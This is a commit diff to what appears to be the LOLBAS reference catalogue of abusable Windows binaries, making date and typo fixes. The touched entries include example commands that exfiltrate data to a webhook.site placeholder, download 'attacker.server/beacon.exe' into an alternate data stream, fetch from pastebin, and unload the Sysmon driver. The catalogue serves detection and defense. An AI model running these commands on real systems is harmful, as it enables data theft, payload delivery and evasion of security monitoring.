Applying minor format changes (incorrectly formatted dates, typos, etc.)

yml/OSBinaries/AppInstaller.yml

@@ -2,7 +2,7 @@
 Name: AppInstaller.exe
 Description: Tool used for installation of AppX/MSIX applications on Windows 10
 Author: 'Wade Hickey'
-Created: '2020-12-02'
+Created: 2020-12-02
 Commands:
   - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
     Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>

yml/OSBinaries/Atbroker.yml

@@ -6,7 +6,7 @@ Created: 2018-05-25
 Commands:
   - Command: ATBroker.exe /start malware
     Description: Start a registered Assistive Technology (AT).
-    Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
+    Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistive Technology (AT) service entry.
     Category: Execute
     Privileges: User
     MitreID: T1218

yml/OSBinaries/Cmdl32.yml

@@ -2,7 +2,7 @@
 Name: cmdl32.exe
 Description: Microsoft Connection Manager Auto-Download
 Author: 'Elliot Killick'
-Created: '2021-08-26'
+Created: 2021-08-26
 Commands:
   - Command: cmdl32 /vpn /lan %cd%\config
     Description: Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where "X" denotes a random number or letter.

yml/OSBinaries/ConfigSecurityPolicy.yml

@@ -4,7 +4,7 @@ Description: Binary part of Windows Defender. Used to manage settings in Windows
 Author: 'Ialle Teixeira'
 Created: 2020-09-04
 Commands:
-  - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
+  - Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
     Description: Upload file, credentials or data exfiltration in general
     Usecase: Upload file
     Category: Upload

yml/OSBinaries/DataSvcUtil.yml

@@ -2,9 +2,9 @@
 Name: DataSvcUtil.exe
 Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
 Author: 'Ialle Teixeira'
-Created: '01/12/2020'
+Created: 2020-12-01
 Commands:
-  - Command: DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
+  - Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile
     Description: Upload file, credentials or data exfiltration in general
     Usecase: Upload file
     Category: Upload

yml/OSBinaries/Dllhost.yml

@@ -2,7 +2,7 @@
 Name: Dllhost.exe
 Description: Used by Windows to DLL Surrogate COM Objects
 Author: 'Nasreddine Bencherchali'
-Created: '2020-11-07'
+Created: 2020-11-07
 Commands:
   - Command: dllhost.exe /Processid:{CLSID}
     Description: Use dllhost.exe to load a registered or hijacked COM Server payload.

yml/OSBinaries/FltMC.yml

@@ -2,7 +2,7 @@
 Name: fltMC.exe
 Description: Filter Manager Control Program used by Windows
 Author: 'John Lambert'
-Created: '2021-09-18'
+Created: 2021-09-18
 Commands:
   - Command: fltMC.exe unload SysmonDrv
     Description: Unloads a driver used by security agents

yml/OSBinaries/IMEWDBLD.yml

@@ -2,7 +2,7 @@
 Name: IMEWDBLD.exe
 Description: Microsoft IME Open Extended Dictionary Module
 Author: 'Wade Hickey'
-Created: '2020-03-05'
+Created: 2020-03-05
 Commands:
   - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
     Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>

yml/OSBinaries/MpCmdRun.yml

@@ -18,7 +18,7 @@ Commands:
     Privileges: User
     MitreID: T1105
     OperatingSystem: Windows 10
-  - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
+  - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe
     Description: Download file to machine and store it in Alternate Data Stream
     Usecase: Hide downloaded data inton an Alternate Data Stream
     Category: ADS

yml/OSBinaries/OfflineScannerShell.yml

@@ -2,7 +2,7 @@
 Name: OfflineScannerShell.exe
 Description: Windows Defender Offline Shell
 Author: 'Elliot Killick'
-Created: '2021-08-16'
+Created: 2021-08-16
 Commands:
   - Command: OfflineScannerShell
     Description: Execute mpclient.dll library in the current working directory

yml/OSBinaries/OneDriveStandaloneUpdater.yml

@@ -2,7 +2,7 @@
 Name: OneDriveStandaloneUpdater.exe
 Description: OneDrive Standalone Updater
 Author: 'Elliot Killick'
-Created: '2021-08-22'
+Created: 2021-08-22
 Commands:
   - Command: OneDriveStandaloneUpdater
     Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json

yml/OSBinaries/PrintBrm.yml

@@ -2,7 +2,7 @@
 Name: PrintBrm.exe
 Description: Printer Migration Command-Line Tool
 Author: 'Elliot Killick'
-Created: '2021-06-21'
+Created: 2021-06-21
 Commands:
   - Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
     Description: Create a ZIP file from a folder in a remote drive

yml/OSBinaries/SettingSyncHost.yml

@@ -2,7 +2,7 @@
 Name: SettingSyncHost.exe
 Description: Host Process for Setting Synchronization
 Author: 'Elliot Killick'
-Created: '2021-08-26'
+Created: 2021-08-26
 Commands:
   - Command: SettingSyncHost -LoadAndRunDiagScript anything
     Description: Execute file specified in %COMSPEC%

yml/OSBinaries/Stordiag.yml

@@ -2,7 +2,7 @@
 Name: Stordiag.exe
 Description: Storage diagnostic tool
 Author: 'Eral4m'
-Created: '2021-10-21'
+Created: 2021-10-21
 Commands:
   - Command: stordiag.exe
     Description: Once executed, Stordiag.exe will execute schtasks.exe systeminfo.exe and fltmc.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.

yml/OSBinaries/WorkFolders.yml

@@ -2,7 +2,7 @@
 Name: WorkFolders.exe
 Description: Work Folders
 Author: 'Elliot Killick'
-Created: '2021-08-16'
+Created: 2021-08-16
 Commands:
   - Command: WorkFolders
     Description: Execute control.exe in the current working directory